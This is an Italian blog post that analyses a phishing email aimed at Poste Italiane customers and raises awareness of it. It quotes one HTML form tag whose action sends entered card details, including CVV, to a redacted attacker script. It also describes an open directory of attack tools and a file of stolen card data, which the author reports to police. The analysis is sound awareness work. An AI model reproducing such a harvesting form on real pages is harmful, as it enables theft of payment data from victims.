Il taccuino di Armando Leotta Rotating Header Image

Vogliamo guardare in faccia questo #phishing? Ancora #poste

Ancora una volta gli utenti di Poste Italiane sono le vittime di un attacco di phishing.

Una mail, una delle tante che arrivano e che non sono state rilevate dai sistemi di sicurezza?

Non propriamente “una delle tante”.

Guardiamola insieme: ecco come si presenta:

NOTA: tutti i link puntano a poste.it

NOTA: tutti i link puntano a poste.it (cliccare per ingrandire)

Perchè è “ben fatta”? Perchè tutti i link puntano al sito ufficiale di poste.it.

Ripeto per i lettori frettolosi.

Tutti i link puntano a poste.it: il login in alto a destra, il registrati, i banner in basso sia a sinistra che a destra.

Tutti.

Cosa non torna?

Per accedere ai servizi online nessuno si sognerebbe di chiedere i dati di carta di credito al completo (fullz, ndr)!

E’ il caso di controllare il sorgente di questo simpatico htm.

Bingo!

Vedete quel familiarissimo tasto “Accedi”?

_______<stralcio>____

Accedi ai Servizi Online </strong></p>

<form name=”loginform1″ method=”POST” onsubmit=”javascript: return logintest(this);” action=”http://www.XXXXXXXXXX.com/.XXXXXXXX/done.php“>

_______</stralcio>____

Che meravigliosa action!

Pertanto, chi inserisce le credenziali (leggasi i propri dati completi della carta di credito postepay / bancoposta comprensivo di cvv) per “accedere” ai servizi contatta tramite l’azione quel done.php.

Bene.

Verifichiamo cosa fa questo delizioso quanto inaspettato php.

Innanzitutto notiamo se c’è dell’altro sul sito per capire anche la dimensione del fenomeno.

Qui l’attaccante, per probabile dimenticanza o per poter usare la funzionalità con qualche bot, lascia la cartella XXXXXXXX con i permessi per il listing.

Quello che trovo è decisamente un arsenale di tool di attacchi e di spam. Il tutto sfruttabile via web sfruttando le risorse del malcapitato owner del sito web opportunamente bucato.

E non solo.

Trovo un file che non vorrei avere mai trovato.

Tornando sulla pagina incriminata,  scrivendo dei dati finti nella form e completando l’operazione cliccando su “Accedi” si ha l’ennesima triste evidenza: sul server XXXXXX un file è stato appena modificato.

E’ un innocente file di testo che contiene i dati delle carte di credito di tutti gli ignari ed ingenui malcapitati clienti di Postepay/Bancoposta, comprensi quelli fittizi appena inseriti come test.

Ovviamente ho rimosso il nome reale del sito in quanto è ancora raggiungibile.

Mentre vi scrivo ho già effettuato la segnalazione sul sito della Polizia di Stato.

Brutta storia.

Spero serva a riflettere.

#awareness is the key.

_____
Clusit

Be Sociable, Share!